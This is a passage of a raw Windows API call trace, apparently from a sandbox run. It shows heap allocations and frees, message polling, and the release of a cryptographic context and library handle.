wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.053] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.053] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0259.054] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0259.054] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.054] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55bc8 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0259.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.054] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.054] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.054] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ed8 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0259.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.054] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0259.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0259.055] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ce0 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0259.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.055] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.055] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.055] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0259.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0259.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0259.056] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0259.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0259.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0259.069] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0259.069] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0259.069] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0259.069] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0259.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0259.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0259.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0259.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.069] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0259.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.070] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.070] FreeLibrary (hLibModule=0x756e0000) returned 1 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0259.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0259.070] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0259.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0259.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0259.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0259.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0259.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0259.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0259.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0259.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0259.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0259.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0259.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0259.071] CloseHandle (hObject=0x2d0) returned 1 [0259.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0259.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0259.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0259.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0259.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0259.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0259.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0259.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0259.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0259.074] CloseHandle (hObject=0x2a0) returned 1 [0259.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0259.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0259.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0259.078] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0259.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0259.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0259.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0259.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0259.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0259.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0259.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | 